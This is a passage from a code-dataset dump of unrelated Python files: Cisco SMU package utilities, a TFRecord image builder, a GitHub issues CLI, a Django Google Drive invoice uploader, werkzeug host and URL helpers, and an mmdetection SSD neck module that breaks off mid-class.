text stringlengths 957 885k |
|---|
<filename>csmserver/smu_utils.py
# =============================================================================
# Copyright (c) 2016, Cisco Systems, Inc
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
# =============================================================================
from database import DBSession
from constants import UNKNOWN
from constants import PackageType
from smu_info_loader import SMUInfoLoader
from smu_advisor import get_excluded_supersede_list
from smu_advisor import get_missing_required_prerequisites
from smu_advisor import get_dict_from_list
from utils import multiple_replace
SMU_INDICATOR = 'CSC'
SP_INDICATOR = '.sp'
TAR_INDICATOR = 'iosxr'
def get_package_type(name):
    """
    Classify a package name into one of the PackageType values.

    Only ASR9K supports the Service Pack concept.
    Example: asr9k-px-4.3.2.sp-1.0.0 or asr9k-px-4.3.2.k9-sp-1.0.0
    """
    if SMU_INDICATOR in name:
        return PackageType.SMU
    if SP_INDICATOR in name:
        return PackageType.SERVICE_PACK
    if TAR_INDICATOR in name:
        return PackageType.SOFTWARE
    return PackageType.PACKAGE
def get_smu_lookup_name(name):
    """
    Given a package name, try to derive a name which can be used to look up a
    SMU or SP in the SMU meta file.

    There is no guarantee that the correct name can be derived; that depends on
    whether the given name falls within the parsing criteria.

    :param name: A package name, possibly with a location prefix and a file
        extension, e.g. "disk0:asr9k-px-4.2.1.CSCud90009-1.0.0.pie".
    :return: The derived lookup name, e.g. "asr9k-px-4.2.1.CSCud90009".
    """
    name = name.strip()
    package_type = get_package_type(name)
    if package_type != PackageType.SMU and package_type != PackageType.SERVICE_PACK:
        return name
    # Strip known file extensions.
    # .smu is for NCS6K, .rpm is for ASR9K-X64
    rep_dict = {'.pie': '', '.smu': '', '.rpm': ''}
    name = multiple_replace(name, rep_dict)
    # Skip the location string (e.g. "disk0:") if found.
    pos = name.find(':')
    if pos != -1:
        name = name[pos + 1:]
    # For SMU, the resultant name needs to be in this format: "asr9k-px-4.2.1.CSCud90009".
    # However, on the device, the SMU is in this format: "asr9k-px-4.2.1.CSCud90009-1.0.0".
    pos = name.find(SMU_INDICATOR)
    if pos != -1:
        # Strip the trailing "-1.0.0" version string if found.
        try:
            # Fix: catch only ValueError (raised by str.index when the
            # separator is absent) instead of a bare except; the original
            # also dead-checked index() for -1, which it never returns.
            name = name[:name.index('-', pos)]
        except ValueError:
            pass
    return name
def union_set_from_dict(smu_info_dict):
    """
    Union all the value sets of a dictionary into one set.

    The smu_info_dict maps smu name -> set().
    """
    return set().union(*smu_info_dict.values()) if smu_info_dict else set()
def get_missing_prerequisite_list(smu_loader, smu_name_list):
    """
    :param smu_loader: A valid SMUInfoLoader instance
    :param smu_name_list: A list of SMU names. For example,
        asr9k-px-6.1.3.CSCvd54775
        ncs5500-6.1.3.CSCvd07722
    :return: Returns a list of SMU names that are the missing pre-requisites, if any.
    """
    if not smu_loader.is_valid:
        return []
    # Resolve each name to its SMUInfo, dropping names the loader does not know.
    smu_info_dict = {}
    for smu_name in smu_name_list:
        info = smu_loader.get_smu_info(smu_name)
        if info is not None:
            smu_info_dict[smu_name] = info
    if not smu_info_dict:
        return []
    # Exclude all the superseded SMUs before computing missing pre-requisites.
    excluded_supersede_list = get_excluded_supersede_list(smu_info_dict.values())
    missing = get_missing_required_prerequisites(smu_loader, excluded_supersede_list)
    return list(union_set_from_dict(missing))
def get_peer_packages(db_session, smu_loader, package_name):
    """
    On eXR platforms, a SMU may contain multiple RPMs. Not only does CSM need
    to check for missing pre-requisites, but also missing peers in the same SMU.

    :param db_session: A DBSession instance
    :param smu_loader: A SMUInfoLoader instance
    :param package_name: A package name
    :return: Returns the peer packages (a possibly empty list).
    """
    smu_info = smu_loader.get_smu_info(
        SMUInfoLoader.get_smu_name_from_package_name(db_session, package_name=package_name))
    return [] if smu_info is None else smu_info.package_names.split(',')
def get_smu_info_dict(db_session, smu_loader, package_list):
    """
    Given a package list, return a dictionary mapping each package name to its
    SMUInfo. If a package name cannot be resolved to a SMU name, its value is None.

    :param db_session: A DBSession instance
    :param smu_loader: A SMUInfoLoader instance
    :param package_list: A list of package names, e.g.
        asr9k-px-6.1.3.CSCvd54775.pie
        ncs5500-k9sec-2.2.0.2-r613.CSCvd18741.x86_64.rpm
    :return: dict of package_name -> SMUInfo (or None)
    """
    return {
        package_name: smu_loader.get_smu_info(
            SMUInfoLoader.get_smu_name_from_package_name(db_session, package_name=package_name))
        for package_name in package_list
    }
def get_optimized_list(package_to_optimize_list):
    """
    Return the validated/optimized list given the SMU/SP list.

    The input may contain packages, SMUs, SPs, or junk text. Each entry of the
    returned list is a dict with keys 'software_package', 'is' (the
    classification: Pre-requisite / Superseded / SMU/SP / Package /
    Unrecognized) and 'description'.
    """
    unrecognized_list = []
    package_list = []
    result_list = []
    db_session = DBSession()
    smu_loader = SMUInfoLoader.get_loader_from_package(package_to_optimize_list)
    if not smu_loader.is_valid:
        # No loader for this platform/release: nothing can be classified.
        for package_name in package_to_optimize_list:
            result_list.append({'software_package': package_name, 'is': 'Unrecognized', 'description': ''})
        return result_list

    smu_info_list = set()
    # Fix: reuse the session created above instead of opening a second
    # DBSession for the same operation.
    smu_info_dict = get_smu_info_dict(db_session, smu_loader, package_to_optimize_list)
    for package_name, smu_info in smu_info_dict.items():
        if smu_info is None:
            # Check if the entry is a package type.
            platform, _release = SMUInfoLoader.get_platform_and_release(package_name)
            if platform == UNKNOWN:
                unrecognized_list.append(package_name)
            else:
                package_list.append(package_name)
        else:
            smu_info_list.add(smu_info)

    if smu_info_list:
        # Exclude all the superseded SMUs in smu_info_list.
        excluded_supersede_list = get_excluded_supersede_list(smu_info_list)
        missing_required_prerequisite_dict = \
            get_missing_required_prerequisites(smu_loader, excluded_supersede_list)
        for pre_requisite_smu in union_set_from_dict(missing_required_prerequisite_dict):
            pre_requisite_smu_info = smu_loader.get_smu_info(pre_requisite_smu)
            if pre_requisite_smu_info is None:
                # Fix: the original guarded only 'description' against None and
                # then dereferenced pre_requisite_smu_info.package_names,
                # crashing with AttributeError. Report the bare SMU name instead.
                result_list.append({'software_package': pre_requisite_smu,
                                    'is': 'Pre-requisite', 'description': ''})
                continue
            for package_name in pre_requisite_smu_info.package_names.split(','):
                result_list.append({'software_package': package_name,
                                    'is': 'Pre-requisite',
                                    'description': pre_requisite_smu_info.description})
        excluded_supersede_dict = get_dict_from_list(excluded_supersede_list)
        for smu_info in smu_info_list:
            # SMUs surviving the supersedence filter are reported as SMU/SP;
            # the rest are superseded by something in the list.
            category = 'SMU/SP' if smu_info.name in excluded_supersede_dict else 'Superseded'
            for package_name in smu_info.package_names.split(','):
                result_list.append({'software_package': package_name,
                                    'is': category, 'description': smu_info.description})

    for package_name in package_list:
        result_list.append({'software_package': package_name, 'is': 'Package', 'description': ''})
    for package_name in unrecognized_list:
        result_list.append({'software_package': package_name, 'is': 'Unrecognized', 'description': ''})
    return result_list
if __name__ == '__main__':
    # This module is import-only; it has no standalone behavior.
    pass
<gh_stars>1-10
"""
Toy data tf records cats vs dogs
"""
import tensorflow as tf
import imageio
import numpy as np
import sys
import glob
import param_gedi as param
import os
import cv2
import matplotlib.pyplot as plt
class Record:
    """Build train/val/test TFRecord files for a toy cats-vs-dogs dataset.

    Images are listed, shuffled with a fixed seed, split by the fractional
    `split` list, and serialized with `tiff2record`.
    """

    def __init__(self, images_dir_A, images_dir_B, tfrecord_dir, split):
        # NOTE(review): images_dir_A / images_dir_B are accepted but never
        # used — the file list below comes from a hard-coded path. Confirm
        # whether they should replace it.
        cats = []
        dogs = []
        self.tfrecord_dir = tfrecord_dir
        _files = glob.glob(os.path.join('/mnt/finkbeinerlab/robodata/Josh/dogs_vs_cats/train/*.jpg'))
        for f in _files:
            # Filenames look like 'cat.123.jpg' / 'dog.456.jpg'; the first
            # dot-separated token is the class name.
            parts = f.split('/')[-1].split('.')
            if parts[0] == 'cat':
                cats.append(f)
            elif parts[0] == 'dog':
                dogs.append(f)
        np.random.shuffle(cats)
        np.random.shuffle(dogs)
        self.impaths_A = list(cats)
        self.impaths_B = list(dogs)
        label_A = 1  # cat
        label_B = 0  # dog
        self.labels_A = np.int16(np.ones(len(self.impaths_A)) * label_A)
        self.labels_B = np.int16(np.ones(len(self.impaths_B)) * label_B)
        self._impaths = np.array(self.impaths_A + self.impaths_B)
        self._labels = np.append(self.labels_A, self.labels_B)
        assert len(self._impaths) == len(self._labels), 'Length of images and labels do not match.'
        assert len(self.impaths_A) + len(self.impaths_B) == len(
            self._impaths), 'Summed lengths of image paths do not match'
        # Seeded shuffle of the combined set so splits are reproducible.
        self.shuffled_idx = np.arange(len(self._impaths))
        np.random.seed(0)
        np.random.shuffle(self.shuffled_idx)
        print(self.shuffled_idx)
        self.impaths = self._impaths[self.shuffled_idx]
        self.labels = self._labels[self.shuffled_idx]
        # NOTE(review): this is a probabilistic sanity check — it fails if the
        # shuffle happens to leave index 0 in place.
        assert self.impaths[0] != self._impaths[0], 'check randomization'
        length = len(self.impaths)
        # Split into train/val/test by the fractions in `split`.
        self.trainpaths = self.impaths[:int(length*split[0])]
        self.valpaths = self.impaths[int(length*split[0]):int(length * (split[0] + split[1]))]
        self.testpaths = self.impaths[int(length * (split[0] + split[1])):]
        self.trainlbls = self.labels[:int(length*split[0])]
        self.vallbls = self.labels[int(length*split[0]):int(length * (split[0] + split[1]))]
        self.testlbls = self.labels[int(length * (split[0] + split[1])):]

    def load_image(self, im_path):
        """Read an image from disk and return it resized to 224x224 as float32."""
        img = cv2.imread(im_path)
        img = cv2.resize(img, (224,224), interpolation=cv2.INTER_LINEAR)
        # plt.imshow(img)
        # plt.show()
        # assume it's the correct size, otherwise resize here
        img = img.astype(np.float32)
        return img

    def _int64_feature(self, value):
        # Wrap a scalar integer as a tf.train.Feature.
        return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))

    def _bytes_feature(self, value):
        # Wrap raw bytes as a tf.train.Feature.
        return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))

    def tiff2record(self, tf_data_name, filepaths, labels):
        """
        Generates tfrecord in a loop.
        Args:
            tf_data_name: name of tfrecord file
            filepaths: image paths to serialize
            labels: integer labels aligned with filepaths
        Returns:
        """
        assert len(filepaths)==len(labels), 'len of filepaths and labels do not match {} {}'.format(len(filepaths), len(labels))
        with tf.io.TFRecordWriter(os.path.join(self.tfrecord_dir, tf_data_name)) as writer:
            for i in range(len(filepaths)):
                # one less in range for matching pairs
                if not i % 100:
                    print('Train data:', i)  # Python 3 has default end = '\n' which flushes the buffer
                    # sys.stdout.flush()
                filename = str(filepaths[i])
                img = self.load_image(filename)
                label = labels[i]
                filename = str(filename)
                filename = str.encode(filename)
                # feature = {'label': self._int64_feature(label),
                #            'image': self._bytes_feature(tf.compat.as_bytes(img.tostring())),
                #            'filename': self._bytes_feature(filename)}
                # NOTE(review): ndarray.tostring() is deprecated in newer NumPy
                # in favour of tobytes() — confirm the pinned NumPy version.
                feature = {'image': self._bytes_feature(tf.compat.as_bytes(img.tostring())),
                           'label': self._int64_feature(label)}
                example = tf.train.Example(features=tf.train.Features(feature=feature))
                writer.write(example.SerializeToString())
        print('Saved to ' + os.path.join(self.tfrecord_dir, tf_data_name))
        sys.stdout.flush()
if __name__ == '__main__':
    p = param.Param()
    # Source crop directories; Record currently reads a hard-coded path, but
    # the constructor interface still takes them.
    pos_dir = '/mnt/data/MJFOX/Crops/positive/DNE'
    neg_dir = '/mnt/data/MJFOX/Crops/negative/DNE'
    split = [.7, .15, .15]
    Rec = Record(pos_dir, neg_dir, p.tfrecord_dir, split)
    # Serialize each split to its own TFRecord file.
    jobs = (
        ('train_catsdogs.tfrecord', Rec.trainpaths, Rec.trainlbls),
        ('val_catsdogs.tfrecord', Rec.valpaths, Rec.vallbls),
        ('test_catsdogs.tfrecord', Rec.testpaths, Rec.testlbls),
    )
    for fname, paths, lbls in jobs:
        Rec.tiff2record(os.path.join(p.tfrecord_dir, fname), paths, lbls)
<filename>gitissues/cli.py
import click
import configparser
from .utils import authenticate, get_config_path, get_token, get_repo_name
from tabulate import tabulate
from .classes import Github, GithubIssue
from .colour import COLOR
@click.group()
def cli():
    """
    A command line interface to manage all your git issues at one place
    """
    # Group entry point: subcommands are registered below via @cli.command().
    pass
@cli.command()
@click.option("-t", "--token", help="personal access token unique to you. Requires repo, read:org permissions")
def login(token):
    """
    gets token from the user to perform authenticated api calls
    """
    # Prompt interactively when the token was not passed on the command line.
    if token is None:
        token = click.prompt(
            "Tip: You can generate your personal access token at https://github.com/settings/tokens\nToken",
            hide_input=True,
        )
    # Persist the token so subsequent commands can authenticate.
    parser = configparser.ConfigParser()
    parser['github-user'] = {'token': token}
    with open(get_config_path(), 'w') as fh:
        parser.write(fh)
@cli.command()
@click.option("-r", "--repo", help="github repository in format username/repo", default=None)
@click.option("-t", "--title", help="issue title", default=None)
@click.option("-b", "--body", help="description of the issue", default=None)
@click.option("-l", "--labels", help="issue labels. add multiple labels by specifying the option again.", default=None, multiple=True)
@click.option("-a", "--assignees", help="users to assign. add multiple usernames by specifying the option again.", default=None, multiple=True)
def create(repo, title, body, labels, assignees):
    """
    create an issue on a github repo
    """
    authenticate()
    token = get_token()
    repository = get_repo_name(repo)
    # Fix: compare to None with 'is', not '=='.
    if title is None:
        title = click.prompt("An issue title is mandatory.\nTitle")
    g = Github(token)
    repo = g.get_repo(repository)
    issue = repo.create_issue(title=title, body=body, labels=labels, assignees=assignees)
    print(f"Issue #{issue.number} Created Successfully in {repository}\n\n{issue.html_url}")
@cli.command()
@click.argument("number", type=int)
@click.option("-r", "--repo", help="github repository in format username/repo", default=None)
def close(repo, number):
    """
    close an issue on a github repo
    """
    authenticate()
    repository = get_repo_name(repo)
    gh = Github(get_token())
    issue = gh.get_repo(repository).get_issue(number)
    issue.close_issue()
    print(f"Issue #{issue.number} Closed Successfully in {repository}\n\n{issue.html_url}")
@cli.command()
@click.argument("number", type=int)
@click.option("-r", "--repo", help="github repository in format username/repo", default=None)
def reopen(repo, number):
    """
    reopen an issue on a github repo
    """
    authenticate()
    repository = get_repo_name(repo)
    gh = Github(get_token())
    issue = gh.get_repo(repository).get_issue(number)
    issue.reopen_issue()
    print(f"Issue #{issue.number} Reopened Successfully in {repository}\n\n{issue.html_url}")
@cli.command()
@click.argument("number", type=int)
@click.option("-b", "--body", help="comment body", default=None)
@click.option("-r", "--repo", help="github repository in format username/repo", default=None)
def comment(body, repo, number):
    """
    create a new comment on a github issue
    """
    authenticate()
    token = get_token()
    repository = get_repo_name(repo)
    # Fix: compare to None with 'is', not '=='.
    if body is None:
        body = click.prompt("Issue comment requires a body.\nComment")
    g = Github(token)
    repo = g.get_repo(repository)
    issue = repo.get_issue(number)
    comment = issue.create_comment(body=body)
    print(f"Comment created in issue #{issue.number} in {repository}\n\n{comment['html_url']}")
@cli.command()
@click.argument("number", type=int)
@click.option("-r", "--repo", help="github repository in format username/repo", default=None)
@click.option("-t", "--title", help="issue title", default=None)
@click.option("-b", "--body", help="description of the issue", default=None)
@click.option("-s", "--state", help="state of the issue. can be one of open or closed", type=click.Choice(['open', 'closed'], case_sensitive=False), default=None)
@click.option("-l", "--labels", help="issue labels. add multiple labels by specifying the option again.", default=None, multiple=True)
@click.option("-a", "--assignees", help="users to assign. add multiple usernames by specifying the option again.", default=None, multiple=True)
def update(number, repo, title, body, state, labels, assignees):
    """
    update an issue on a github repo
    """
    authenticate()
    repository = get_repo_name(repo)
    gh = Github(get_token())
    issue = gh.get_repo(repository).get_issue(number)
    # Unset options arrive as None / empty tuples and are passed through as-is.
    issue.update_issue(title=title, body=body, labels=labels, assignees=assignees, state=state)
    print(f"Issue #{issue.number} updated successfully in {repository}\n\n{issue.html_url}")
@cli.command()
@click.option("-r", "--repo", help="github repository in format username/repo", default=None)
@click.option("-s", "--state", help="state of the issue. can be one of open, closed or all",
              type=click.Choice(['open', 'closed', 'all'], case_sensitive=False), default='open')
@click.option("-a", "--author", help="filter by author", default=None)
def list(repo, state, author):
    """
    list issues of a github repo
    """
    # NOTE: the function name shadows the builtin `list`, but it defines the
    # CLI command name, so it is kept for compatibility.
    authenticate()
    token = get_token()
    repository = get_repo_name(repo)
    g = Github(token)
    repo = g.get_repo(repository)
    issues = repo.get_issues(params={'state': state, 'creator': author})
    table = [issue.get_table_attrs() for issue in issues]
    if not issues:
        # Fix: the original condition was inverted — it printed "No open
        # issues" only when state == 'all' and dropped the state otherwise.
        qualifier = '' if state == 'all' else f"{state} "
        print(f"No {qualifier}issues found in {repository}.")
    print(tabulate(table, tablefmt="github"))
@cli.command()
@click.argument("number", type=int)
@click.option("-r", "--repo", help="github repository in format username/repo", default=None)
def view(repo, number):
    """
    view an issue on a github repo
    """
    authenticate()
    repository = get_repo_name(repo)
    gh = Github(get_token())
    issue = gh.get_repo(repository).get_issue(number)
    # Header: bold title, bullet separator, state.
    print(f"{COLOR['BOLD']}{issue.title}{COLOR['ENDC']} \u2022 {issue.state}\n")
    if issue.body:
        print(f"{issue.body}")
    if issue.labels:
        print(f"\nLabels: {COLOR['BLUE']}{', '.join(issue.labels)}{COLOR['ENDC']}")
    if issue.assignees:
        print(f"Assignees: {COLOR['GREEN']}{', '.join(issue.assignees)}{COLOR['ENDC']}")
    print(f"\nCreated {issue.created}")
    print(f"\nLink: {issue.html_url}\n")
@cli.command()
@click.argument("number", type=int)
@click.option("-r", "--repo", help="github repository in format username/repo", default=None)
@click.option("-l", "--lock-reason", help="reason to lock the issue",
              type=click.Choice(['off topic', 'too heated', 'resolved', 'spam'], case_sensitive=False), default=None)
def lock(number, repo, lock_reason):
    """
    lock an issue. requires push access.
    must provide one of the reasons for lock
    - off topic, too heated, resolved, spam
    """
    # A lock reason is mandatory; prompt for one before authenticating.
    if lock_reason is None:
        lock_reason = click.prompt(
            "A lock reason must be specified. Lock Reason",
            type=click.Choice(['off topic', 'too heated', 'resolved', 'spam'], case_sensitive=False))
    authenticate()
    repository = get_repo_name(repo)
    gh = Github(get_token())
    issue = gh.get_repo(repository).get_issue(number)
    issue.lock_issue(lock_reason=lock_reason)
    print(f"Issue #{issue.number} Locked in {repository}")
@cli.command()
@click.argument("number", type=int)
@click.option("-r", "--repo", help="github repository in format username/repo", default=None)
def unlock(number, repo):
    """
    unlock an issue.
    requires push access.
    """
    authenticate()
    repository = get_repo_name(repo)
    gh = Github(get_token())
    issue = gh.get_repo(repository).get_issue(number)
    issue.unlock_issue()
    print(f"Issue #{issue.number} unlocked in {repository}")
if __name__ == '__main__':
    # Allow running this module directly as the CLI entry point.
    cli()
import shutil
import tempfile
import os
import os.path
from django.core.management.base import BaseCommand
from django.core.files.storage import default_storage
from django.utils import timezone
from events.models import Expense
from utils import gdrive
# https://drive.google.com/drive/u/0/folders/1Kvfmz1eTNd9y2ZAqosaN3Cn2ydUKjtN_
BASE_FOLDER = '1Kvfmz1eTNd9y2ZAqosaN3Cn2ydUKjtN_'
# folder names in function of invoice type
FOLDER_TYPE_NAMES = {
Expense.INVOICE_TYPE_A: 'Facturas A',
Expense.INVOICE_TYPE_B: 'Facturas B',
Expense.INVOICE_TYPE_C: 'Facturas C',
Expense.INVOICE_TYPE_TICKET: 'Tickets',
Expense.INVOICE_TYPE_OTHER: 'Otros',
}
# to avoid messing with gdrive every time
DIR_CACHE = {}
FILES_CACHE = {}
def ensure_directory(explorer, parent_id, dirname):
    """Ensure 'dirname' directory is present in 'parent'; return its folder id."""
    cache_key = (parent_id, dirname)
    if cache_key in DIR_CACHE:
        return DIR_CACHE[cache_key]
    # Look for an existing folder with that name under the parent.
    folder_id = next(
        (f['id'] for f in explorer.list_folder(parent_id) if f['name'] == dirname),
        None)
    if folder_id is None:
        print("Creating folder {!r} in parent {}".format(dirname, parent_id))
        folder_id = explorer.create_folder(dirname, parent_id)
    DIR_CACHE[cache_key] = folder_id
    return folder_id
def get_files(explorer, folder_id):
    """Get files info for a specific folder, cached (name -> file info dict)."""
    if folder_id not in FILES_CACHE:
        FILES_CACHE[folder_id] = {
            f['name']: f for f in explorer.list_folder(folder_id)
        }
    return FILES_CACHE[folder_id]
class Command(BaseCommand):
    # Description shown by `manage.py help`.
    help = "Upload those invoices type A to gdrive"

    def add_arguments(self, parser):
        # Optional period selector in YYYYMM form; defaults to last month.
        parser.add_argument('yearmonth', type=str, nargs='?')

    def handle(self, *args, **options):
        """Upload the selected month's expense invoices to Google Drive."""
        yearmonth = options['yearmonth']
        if yearmonth is None:
            # by default is "last month"
            now = timezone.now()
            year = now.year
            month = now.month - 1
            if month <= 0:
                # January rolls back to December of the previous year.
                year -= 1
                month = 12
        else:
            if len(yearmonth) != 6 or not yearmonth.isdigit():
                print("USAGE: upload_gdrive_invoices.py [YYYYMM]")
                # NOTE(review): relies on the site-provided exit() builtin;
                # sys.exit() would be the conventional choice here.
                exit()
            year = int(yearmonth[:4])
            month = int(yearmonth[4:])
        print("Filtering expenses for year={!r} month={!r}".format(year, month))
        expenses = Expense.objects.filter(
            invoice_date__year=year,
            invoice_date__month=month,
        ).all()
        print("Found {} expenses".format(len(expenses)))
        # ensure needed dirs are present in google drive
        explorer = gdrive.Explorer()
        yearmonth_foldername = "{}{:02d}".format(year, month)
        base_folder_id = ensure_directory(explorer, BASE_FOLDER, yearmonth_foldername)
        for exp in expenses:
            # build useful vars for later
            orig_name = os.path.basename(exp.invoice.name)
            extension = orig_name.rsplit('.')[-1].lower()
            dest_filename = "{:%Y%m%d} - {}: {} [${}] ({}).{}".format(
                exp.invoice_date, exp.event.name, exp.description,
                exp.amount, orig_name, extension)
            dest_foldername_inv_type = FOLDER_TYPE_NAMES[exp.invoice_type]
            print("Processing", repr(dest_filename))
            # ensure dir in google drive, see if file is already there
            folder_id = ensure_directory(explorer, base_folder_id, dest_foldername_inv_type)
            old_files = get_files(explorer, folder_id)
            if dest_filename in old_files:
                old_info = old_files[dest_filename]
                # Same name and same byte size -> assume identical content.
                if int(old_info['size']) == default_storage.size(exp.invoice.name):
                    print(" ignoring, already updated")
                    continue
                print(" different size, uploading again")
            # download the invoice content to a local temp file (flush at the end so all content is
            # available externally, and only after using it close it, as it will then removed)
            local_temp_fh = tempfile.NamedTemporaryFile(mode='wb')
            remote_fh = default_storage.open(exp.invoice.name)
            shutil.copyfileobj(remote_fh, local_temp_fh)
            local_temp_fh.flush()
            # upload
            explorer.upload(local_temp_fh.name, folder_id, filename=dest_filename)
            local_temp_fh.close()
            print(" uploaded")
|
import typing as t
from .._internal import _encode_idna
from ..exceptions import SecurityError
from ..urls import uri_to_iri, url_quote
def host_is_trusted(hostname: str, trusted_list: t.Iterable[str]) -> bool:
    """Check if a host matches a list of trusted names.

    :param hostname: The name to check.
    :param trusted_list: A list of valid names to match. If a name
        starts with a dot it will match all subdomains.

    .. versionadded:: 0.9
    """
    if not hostname:
        return False
    if isinstance(trusted_list, str):
        trusted_list = [trusted_list]

    def _normalize(value: str) -> bytes:
        # Drop any port suffix before IDNA-encoding.
        if ":" in value:
            value = value.rsplit(":", 1)[0]
        return _encode_idna(value)

    try:
        hostname_bytes = _normalize(hostname)
    except UnicodeError:
        return False

    for ref in trusted_list:
        # A leading dot means "this name and every subdomain of it".
        suffix_match = ref.startswith(".")
        if suffix_match:
            ref = ref[1:]
        try:
            ref_bytes = _normalize(ref)
        except UnicodeError:
            return False
        if ref_bytes == hostname_bytes:
            return True
        if suffix_match and hostname_bytes.endswith(b"." + ref_bytes):
            return True
    return False
def get_host(
    scheme: str,
    host_header: t.Optional[str],
    server: t.Optional[t.Tuple[str, t.Optional[int]]] = None,
    trusted_hosts: t.Optional[t.Iterable[str]] = None,
) -> str:
    """Return the host for the given parameters.

    This first checks the ``host_header``. If it's not present, then
    ``server`` is used. The host will only contain the port if it is
    different than the standard port for the protocol.

    Optionally, verify that the host is trusted using
    :func:`host_is_trusted` and raise a
    :exc:`~werkzeug.exceptions.SecurityError` if it is not.

    :param scheme: The protocol the request used, like ``"https"``.
    :param host_header: The ``Host`` header value.
    :param server: Address of the server. ``(host, port)``, or
        ``(path, None)`` for unix sockets.
    :param trusted_hosts: A list of trusted host names.

    :return: Host, with port if necessary.
    :raise ~werkzeug.exceptions.SecurityError: If the host is not
        trusted.
    """
    if host_header is not None:
        host = host_header
    elif server is not None:
        # Unix sockets carry None as the port; omit it from the host string.
        host = server[0] if server[1] is None else f"{server[0]}:{server[1]}"
    else:
        host = ""

    # Drop the port when it is the default for the scheme.
    if scheme in {"http", "ws"} and host.endswith(":80"):
        host = host[:-3]
    elif scheme in {"https", "wss"} and host.endswith(":443"):
        host = host[:-4]

    if trusted_hosts is not None and not host_is_trusted(host, trusted_hosts):
        raise SecurityError(f"Host {host!r} is not trusted.")
    return host
def get_current_url(
    scheme: str,
    host: str,
    root_path: t.Optional[str] = None,
    path: t.Optional[str] = None,
    query_string: t.Optional[bytes] = None,
) -> str:
    """Recreate the URL for a request. If an optional part isn't
    provided, it and subsequent parts are not included in the URL.

    The URL is an IRI, not a URI, so it may contain Unicode characters.
    Use :func:`~werkzeug.urls.iri_to_uri` to convert it to ASCII.

    :param scheme: The protocol the request used, like ``"https"``.
    :param host: The host the request was made to. See :func:`get_host`.
    :param root_path: Prefix that the application is mounted under. This
        is prepended to ``path``.
    :param path: The path part of the URL after ``root_path``.
    :param query_string: The portion of the URL after the "?".
    """
    parts = [scheme, "://", host]
    if root_path is None:
        parts.append("/")
    else:
        parts.append(url_quote(root_path.rstrip("/")))
        parts.append("/")
        if path is not None:
            parts.append(url_quote(path.lstrip("/")))
            if query_string:
                parts.append("?")
                parts.append(url_quote(query_string, safe=":&%=+$!*'(),"))
    return uri_to_iri("".join(parts))
|
<reponame>VietDunghacker/VarifocalNet
import torch
import torch.nn as nn
from mmcv.cnn import ConvModule, DepthwiseSeparableConvModule
from ..builder import NECKS
@NECKS.register_module()
class SSDNeck(nn.Module):
"""Extra layers of SSD backbone to generate multi-scale feature maps.
Args:
in_channels (Sequence[int]): Number of input channels per scale.
out_channels (Sequence[int]): Number of output channels per scale.
level_strides (Sequence[int]): Stride of 3x3 conv per level.
level_paddings (Sequence[int]): Padding size of 3x3 conv per level.
l2_norm_scale (float|None): L2 normalization layer init scale.
If None, not use L2 normalization on the first input feature.
last_kernel_size (int): Kernel size of the last conv layer.
Default: 3.
use_depthwise (bool): Whether to use DepthwiseSeparableConv.
Default: False.
conv_cfg (dict): Config dict for convolution layer. Default: None.
norm_cfg (dict): Dictionary to construct and config norm layer.
Default: None.
act_cfg (dict): Config dict for activation layer.
Default: dict(type='ReLU').
init_cfg (dict or list[dict], optional): Initialization config dict.
"""
def __init__(self,
in_channels,
out_channels,
level_strides,
level_paddings,
l2_norm_scale=20.,
last_kernel_size=3,
use_depthwise=False,
conv_cfg=None,
norm_cfg=None,
act_cfg=dict(type='ReLU'),
init_cfg=[
dict(
type='Xavier', distribution='uniform',
layer='Conv2d'),
dict(type='Constant', val=1, layer='BatchNorm2d'),
]):
super(SSDNeck, self).__init__(init_cfg)
assert len(out_channels) > len(in_channels)
assert len(out_channels) - len(in_channels) == len(level_strides)
assert len(level_strides) == len(level_paddings)
assert in_channels == out_channels[:len(in_channels)]
if l2_norm_scale:
self.l2_norm = L2Norm(in_channels[0], l2_norm_scale)
self.init_cfg += [
dict(
type='Constant',
val=self.l2_norm.scale,
override=dict(name='l2_norm'))
]
self.extra_layers = nn.ModuleList()
extra_layer_channels = out_channels[len(in_channels):]
second_conv = DepthwiseSeparableConvModule if \
use_depthwise else ConvModule
for i, (out_channel, stride, padding) in enumerate(
zip(extra_layer_channels, level_strides, level_paddings)):
kernel_size = last_kernel_size \
if i == len(extra_layer_channels) - 1 else 3
per_lvl_convs = nn.Sequential(
ConvModule(
out_channels[len(in_channels) - 1 + i],
out_channel // 2,
1,
conv_cfg=conv_cfg,
norm_cfg=norm_cfg,
act_cfg=act_cfg),
second_conv(
out_channel // 2,
out_channel,
kernel_size,
stride=stride,
padding=padding,
conv_cfg=conv_cfg,
norm_cfg=norm_cfg,
act_cfg=act_cfg))
self.extra_layers.append(per_lvl_convs)
def forward(self, inputs):
"""Forward function."""
outs = [feat for feat in inputs]
if hasattr(self, 'l2_norm'):
outs[0] = self.l2_norm(outs[0])
feat = outs[-1]
for layer in self.extra_layers:
feat = layer(feat)
outs.append(feat)
return tuple(outs)
class L2Norm(nn.Module):
    """Channel-wise L2 normalization with a learnable per-channel scale."""

    def __init__(self, n_dims, scale=20., eps=1e-10):
        """L2 normalization layer.

        Args:
            n_dims (int): Number of dimensions to be normalized
            scale (float, optional): Defaults to 20..
